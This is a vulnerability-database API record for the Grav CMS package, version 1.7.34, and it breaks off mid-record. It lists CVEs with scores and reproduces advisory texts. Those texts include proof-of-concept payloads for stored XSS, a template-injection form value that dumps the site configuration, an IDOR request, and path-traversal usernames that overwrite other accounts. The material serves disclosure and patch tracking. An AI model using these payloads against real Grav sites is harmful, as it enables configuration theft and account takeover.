{"url":"http://public2.vulnerablecode.io/api/packages/89049?format=json","purl":"pkg:composer/getgrav/grav@1.7.34","type":"composer","namespace":"getgrav","name":"grav","version":"1.7.34","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"2.0.0-beta.2","latest_non_vulnerable_version":"2.0.0-rc.2","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/10202?format=json","vulnerability_id":"VCID-13tt-ebbj-eyg8","summary":"Cross-site scripting (XSS) vulnerability in Grav\nA cross-site scripting (XSS) vulnerability in Grav versions 1.7.44 and before, allows remote authenticated attackers to execute arbitrary web scripts or HTML via the onmouseover attribute of an ISINDEX element.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-31506","reference_id":"","reference_type":"","scores":[{"value":"0.00046","scoring_system":"epss","scoring_elements":"0.14642","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-31506"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://m3n0sd0n4ld.github.io/patoHackventuras/cve-2023-31506","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-16T17:13:14Z/"}],"url":"https://m3n0sd0n4ld.github.io/patoHackventuras/cve-2023-31506"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-31506","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-31506"},{"reference_url":"https://github.com/advisories/GHSA-xrf8-cmrg-7436","reference_id":"GHSA-xrf8-cmrg-7436","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xrf8-cmrg-7436"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/374278?format=json","purl":"pkg:composer/getgrav/grav@1.7.44","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-19e3-3agd-bbc8"},{"vulnerability":"VCID-1gzk-uead-q7ch"},{"vulnerability":"VCID-1kvz-tbnw-dyev"},{"vulnerability":"VCID-2fzp-f93m-afe3"},{"vulnerability":"VCID-31dk-jdqj-pfag"},{"vulnerability":"VCID-47rc-kqnw-7ue8"},{"vulnerability":"VCID-6gtj-f6gc-d3bf"},{"vulnerability":"VCID-91ht-8cax-7kdr"},{"vulnerability":"VCID-9h5a-h26f-cudw"},{"vulnerability":"VCID-9h65-8eka-quhd"},{"vulnerability":"VCID-bdnj-twfh-subp"},{"vulnerability":"VCID-bttg-w7fp-ybd2"},{"vulnerability":"VCID-dmbe-mmj8-3baa"},{"vulnerability":"VCID-dmh7-xvmg-27ef"},{"vulnerability":"VCID-dzhh-3xxa-1ycf"},{"vulnerability":"VCID-euf5-wt5v-fqaf"},{"vulnerability":"VCID-f8zy-fcfc-tfdc"},{"vulnerability":"VCID-fg9g-7eg3-7ygr"},{"vulnerability":"VCID-gcpb-7cu7-q3as"},{"vulnerability":"VCID-hdsp-4e4r-c3fh"},{"vulnerability":"VCID-hwcx-1fp9-3bhh"},{"vulnerability":"VCID-ng3h-ees8-vubs"},{"vulnerability":"VCID-p24p-fcpe-xbah"},{"vulnerability":"VCID-rurt-s65k-1yfk"},{"vulnerability":"VCID-swcx-dmqn-2yf9"},{"vulnerability":"VCID-t3bt-hrw2-jya3"},{"vulnerability":"VCID-ugn8-e63y-1fes"},{"vulnerability":"VCID-vp4w-2f8d-vfcf"},{"vulnerability":"VCID-xe66-6nav-c7gy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.44"}],"aliases":["CVE-2023-31506","GHSA-xrf8-cmrg-7436"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-13tt-ebbj-eyg8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/29672?format=json","vulnerability_id":"VCID-19e3-3agd-bbc8","summary":"Grav Admin Plugin is vulnerable to Cross-Site Scripting (XSS) Stored endpoint `/admin/accounts/groups/[group]` parameter `data[readableName]`\n## Summary\n\nA Stored Cross-Site Scripting (XSS) vulnerability was identified in the `/admin/accounts/groups/Grupo` endpoint of the _Grav_ application. This vulnerability allows attackers to inject malicious scripts into the `data[readableName]` parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.\n\n---\n\n## Details\n\n**Vulnerable Endpoint:** `POST /admin/accounts/groups/Grupo` \n**Parameter:** `data[readableName]`\n\nThe application fails to properly validate and sanitize user input in the `data[readableName]` parameter. This lack of input handling allows attackers to inject arbitrary script content that is stored in the application and executed in the browser of any user who views the affected group configuration.\n\n---\n\n## PoC\n\n**Payload:**\n\n``\n\n1. Navigate to **Accounts > Groups** in the administrative panel.\n \n2. Create a new group or edit an existing one.\n \n3. In the **Display Name** field (`data[readableName]`), insert the payload above and save the changes.\n\n\n\n\nThe following HTTP request was generated during this action:\n\n\n\n4. Next, go to **Accounts > Users** and open any user profile.\n\n\n\n\n5. The malicious script is executed immediately in the browser when the page loads, confirming the existence of a **Stored XSS** vulnerability.\n\n\n\n\n---\n\n## Impact\n\nStored XSS vulnerabilities can result in serious consequences, including:\n\n- **Session hijacking:** Attackers can steal authentication cookies or tokens\n \n- **Malware delivery:** Inserting scripts that download malicious content\n \n- **Credential theft:** Capturing usernames and passwords through injected forms\n \n- **Sensitive data exposure:** Accessing data stored in the browser or the application\n \n- **Browser takeover:** Executing arbitrary commands in the user’s session\n \n- **Phishing attacks:** Redirecting users to fake login or malicious sites\n \n- **Website defacement:** Altering page content shown to users\n \n- **Reputational damage:** Undermining trust in the platform or organization\n\nby [CVE-Hunters](https://github.com/Sec-Dojo-Cyber-House/cve-hunters)","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66312","reference_id":"","reference_type":"","scores":[{"value":"0.00024","scoring_system":"epss","scoring_elements":"0.07374","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66312"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T14:36:06Z/"}],"url":"https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-rmw5-f87r-w988","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T14:36:06Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-rmw5-f87r-w988"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66312","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66312"},{"reference_url":"https://github.com/advisories/GHSA-rmw5-f87r-w988","reference_id":"GHSA-rmw5-f87r-w988","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rmw5-f87r-w988"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63161?format=json","purl":"pkg:composer/getgrav/grav@1.8.0-beta.27","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2fzp-f93m-afe3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"}],"aliases":["CVE-2025-66312","GHSA-rmw5-f87r-w988"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-19e3-3agd-bbc8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/30052?format=json","vulnerability_id":"VCID-1gzk-uead-q7ch","summary":"Grav vulnerable to Information Disclosure via IDOR in Grav Admin Panel\n## **Summary**\n\nAn **IDOR (Insecure Direct Object Reference)** vulnerability in the Grav CMS Admin Panel allows **low-privilege users to access sensitive information** from other accounts.\nAlthough direct account takeover is not possible, **admin email addresses and other metadata can be exposed**, increasing the risk of phishing, credential stuffing, and social engineering.\n\n---\n\n## **Details**\n\n* **Endpoint:** `/admin/accounts/users/{username}`\n* **Tested Version:** Grav Admin 1.7.48\n* **Affected Accounts:** Authenticated users with **0 privileges** (non-privileged accounts)\n\n**Description:**\nRequesting another user’s account details (e.g., `/admin/accounts/users/admin`) as a low-privilege user returns an HTTP **403 Forbidden** response.\nHowever, sensitive information such as the **admin’s email address** is still present in the **response source**, specifically in the `` tag.\n\n**system/src/Grav/Common/Flex/Types/Users/UserCollection.php**\n<img width=\"700\" height=\"327\" alt=\"Screenshot 2025-08-24 021027\" src=\"https://github.com/user-attachments/assets/7e69ae49-d8fc-442f-b00c-9efaec706b2e\" />\n\n**system/blueprints/flex/user-accounts.yaml**\n<img width=\"700\" height=\"300\" alt=\"Screenshot 2025-08-24 020521\" src=\"https://github.com/user-attachments/assets/756631c8-d60b-4b84-a08a-2a9c2f81b41f\" />\n\n\nThis is a classic **IDOR vulnerability**, where object references (usernames) are not properly protected from unauthorized enumeration.\n\n---\n\n## **PoC**\n\n1. Log in as a **non-privileged user** (0-privilege account).\n2. Access another user’s endpoint, for example:\n\n ```\n GET /admin/accounts/users/admin\n ```\n3. Observe the HTTP **403 Forbidden** response.\n4. Inspect the **page source**; sensitive data such as the **admin email** can be seen in the `<title>` tag.\n\n**PoC Video:** \n\n[https://drive.google.com/file/d/1lY_qwqSkN5sPNmHvXGOk6R1mdIgVt71H/view](https://drive.google.com/file/d/1lY_qwqSkN5sPNmHvXGOk6R1mdIgVt71H/view)\n\n---\n\n## **Impact**\n\n* **Type:** Information Disclosure via IDOR\n* **Who is impacted:** Low-privilege authenticated users can enumerate other accounts and extract sensitive metadata (admin emails).\n* **Risk:** Exposed information can be used for targeted phishing, credential stuffing, brute-force attacks, or social engineering campaigns.\n* **Severity Justification:** Only a low-privilege account is required, and sensitive metadata is leaked. Arbitrary code execution is not possible, but the information exposure is **moderate risk**.\n\n---\n\n## **Disclosure & CVE Request**\n\n* We request a **CVE ID** for this vulnerability once validated.\n* Please credit the discovery to:\n\n * **Elvin Nuruyev**\n * **Kanan Farzalili**","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66306","reference_id":"","reference_type":"","scores":[{"value":"0.00045","scoring_system":"epss","scoring_elements":"0.14243","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66306"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/b7e1958a6e807ac14919447b60e5204a2ea77f62","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T20:11:21Z/"}],"url":"https://github.com/getgrav/grav/commit/b7e1958a6e807ac14919447b60e5204a2ea77f62"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-4cwq-j7jv-qmwg","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T20:11:21Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-4cwq-j7jv-qmwg"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66306","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66306"},{"reference_url":"https://github.com/advisories/GHSA-4cwq-j7jv-qmwg","reference_id":"GHSA-4cwq-j7jv-qmwg","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4cwq-j7jv-qmwg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63161?format=json","purl":"pkg:composer/getgrav/grav@1.8.0-beta.27","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2fzp-f93m-afe3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"}],"aliases":["CVE-2025-66306","GHSA-4cwq-j7jv-qmwg"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1gzk-uead-q7ch"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/30323?format=json","vulnerability_id":"VCID-1kvz-tbnw-dyev","summary":"Grav is vulnerable to Server-Side Template Injection (SSTI) via Forms\n### Summary\nHaving a simple form on site can reveal the whole Grav configuration details (including plugin configuration details) by using the correct POST payload. Sensitive information may be contained in the configuration details.\n\n### PoC\nCreate a simple form with two fields, 'registration-number' and 'hp'. Add a submit button and set the method to POST(screenshot attached below). Form name set to 'hero-form'. Send a POST request with the following payload and you will notice a response with a php array listing the whole Grav configuration details - including plugins(screenshot attached).\n\nregistration-number:d643aaaa\n\nhp:vJyifp\n\n__form-name__:hero-form\n\n__unique_form_id__:{{var_dump(_context|slice(0,7))}}\n\n\n\n\n\n\n\n### Impact\nServer-Side Template (SST) vulnerability. The vulnerability affects the latest Grav version as of 25th of Match 2025 (1.7.48) with all plugins installed (including forms plugin v.7.4.2) to their latest versions as well.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66298","reference_id":"","reference_type":"","scores":[{"value":"0.0007","scoring_system":"epss","scoring_elements":"0.21487","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66298"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T14:06:52Z/"}],"url":"https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-8535-hvm8-2hmv","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T14:06:52Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-8535-hvm8-2hmv"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66298","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66298"},{"reference_url":"https://github.com/advisories/GHSA-8535-hvm8-2hmv","reference_id":"GHSA-8535-hvm8-2hmv","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8535-hvm8-2hmv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63161?format=json","purl":"pkg:composer/getgrav/grav@1.8.0-beta.27","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2fzp-f93m-afe3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"}],"aliases":["CVE-2025-66298","GHSA-8535-hvm8-2hmv"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1kvz-tbnw-dyev"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/29854?format=json","vulnerability_id":"VCID-2fzp-f93m-afe3","summary":"Grav vulnerable to Cross-Site Scripting (XSS) Stored endpoint `/admin/pages/[page]` in Multiples parameters\n## Summary\n\nA Stored Cross-Site Scripting (XSS) vulnerability was identified in the `/admin/pages/[page]` endpoint of the _Grav_ application. This vulnerability allows attackers to inject malicious scripts into the `data[header][metadata]`, `data[header][taxonomy][category]`, and `data[header][taxonomy][tag]` parameters. These scripts are stored in the page frontmatter and executed automatically whenever the affected page is accessed or rendered in the administrative interface.\n\n---\n\n## Details\n\n**Vulnerable Endpoint:** `POST /admin/pages/[page]` \n**Parameters:**\n\n- `data[header][metadata]`\n \n- `data[header][taxonomy][category]`\n \n- `data[header][taxonomy][tag]`\n \n\nThe application fails to properly sanitize user input when saving page metadata or taxonomy fields via the Admin Panel. As a result, an attacker with access to the admin interface can inject a malicious script using these parameters, and the script will be stored in the page's YAML frontmatter. When the page or metadata is rendered (especially in the Admin Panel), the payload is executed in the browser of any user with access.\n\n---\n\n## PoC\n\n**Payload:**\n\n`<script>alert('PoC-XXS51')</script>`\n\n### Steps to Reproduce:\n\n1. Log into the _Grav_ Admin Panel and navigate to **Pages**.\n \n2. Create or edit a page.\n \n3. Inject the payload above into any of the following fields in the Options tab:\n \n - **Metadata** key name\n \n - **Category** under Taxonomy\n \n - **Tag** under Taxonomy\n\n\n\n\n4. Save the page.\n\n\nWhen the page is loaded again in the Admin Panel or potentially on the frontend (depending on how the metadata is used), the script is executed, confirming the **Stored XSS** vulnerability.\n\n---\n\n## Impact\n\nStored XSS vulnerabilities can result in serious consequences, including:\n\n- **Session hijacking:** Attackers can steal authentication cookies or tokens\n \n- **Malware delivery:** Injected scripts can download malicious software\n \n- **Credential theft:** Fake input fields can capture usernames and passwords\n \n- **Sensitive data exposure:** Access to internal metadata and browser data\n \n- **Administrative access compromise:** Especially dangerous in admin-facing interfaces\n \n- **Phishing attacks:** Users can be redirected to external malicious sites\n \n- **Reputation damage:** Executing arbitrary scripts in trusted systems undermines credibility\n\nby [CVE-Hunters](https://github.com/Sec-Dojo-Cyber-House/cve-hunters)","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66311","reference_id":"","reference_type":"","scores":[{"value":"0.00024","scoring_system":"epss","scoring_elements":"0.07374","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66311"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T15:53:27Z/"}],"url":"https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-mpjj-4688-3fxg","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T15:53:27Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-mpjj-4688-3fxg"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66311","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66311"},{"reference_url":"https://github.com/advisories/GHSA-mpjj-4688-3fxg","reference_id":"GHSA-mpjj-4688-3fxg","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mpjj-4688-3fxg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63236?format=json","purl":"pkg:composer/getgrav/grav@1.11.0-beta.1","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.11.0-beta.1"}],"aliases":["CVE-2025-66311","GHSA-mpjj-4688-3fxg"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-2fzp-f93m-afe3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/29971?format=json","vulnerability_id":"VCID-31dk-jdqj-pfag","summary":"Grav vulnerable to Path traversal / arbitrary YAML write via user creation leading to Account Takeover / System Corruption\n### Summary\nWhen a user with privilege of user creation creates a new user through the Admin UI and supplies a username containing path traversal sequences (for example ..\\Nijat or ../Nijat), Grav writes the account YAML file to an unintended path outside user/accounts/. The written YAML can contain account fields such as email, fullname, twofa_secret, and hashed_password. In my tests, I was able to cause the Admin UI to write the following content into arbitrary .yaml files (including files like email.yaml, system.yaml, or other site YAML files like admin.yaml) — demonstrating arbitrary YAML write / overwrite via the Admin UI.\n\nExample observed content written by the Admin UI (test data):\nusername: ..\\Nijat\nstate: enabled\nemail: [EMAIL@gmail.com](mailto:EMAIL@gmail.com)\nfullname: 'Nijat Alizada'\nlanguage: en\ncontent_editor: default\ntwofa_enabled: false\ntwofa_secret: RWVEIHC2AFVD6FCR6UHCO3DS4HWXKKDT\navatar: { }\nhashed_password: $2y$10$wl9Ktv3vUmDKCt8o6u2oOuRZr1I04OE0YZf2sJ1QcAherbNnk1XVC\naccess:\nsite:\nlogin: true\n\n\n### Steps to Reproduce\n1. Log in to the Grav Admin UI as an administrator.\n2. Create a new user with the following values (example):\n a. Username: ..\\POC-TOKEN-2025-09-29\n b. Fullname: POC-TOKEN-2025-09-29\n c. Email: poc+2025-09-29@example.test\n d. Password: (any password)\nObserve that a YAML file containing the POC-TOKEN is written outside user/accounts/ (for example in the parent directory of user/accounts)\n\n\n### Impact\n1. Config corruption / service disruption: Overwriting system.yaml, email.yaml, or plugin config files with attacker-controlled YAML (even if limited to fields present in account YAML) could break functionality, disable services, or cause misconfiguration requiring recovery from backups.\n2. Account takeover, any user with create user privilege can modify other user's email and password by just creating a new user with the name \"..\\accounts\\USERNAME_OF_VICTIM\"\n\n\n### Proof of Concept\nhttps://github.com/user-attachments/assets/cf503d74-f765-4031-8e22-71f6b3630847","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66295","reference_id":"","reference_type":"","scores":[{"value":"0.00104","scoring_system":"epss","scoring_elements":"0.28006","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66295"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/3462d94d575064601689b236508c316242e15741","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T14:04:26Z/"}],"url":"https://github.com/getgrav/grav/commit/3462d94d575064601689b236508c316242e15741"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-h756-wh59-hhjv","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T14:04:26Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-h756-wh59-hhjv"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66295","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66295"},{"reference_url":"https://github.com/advisories/GHSA-h756-wh59-hhjv","reference_id":"GHSA-h756-wh59-hhjv","reference_type":"","scores":[{"value"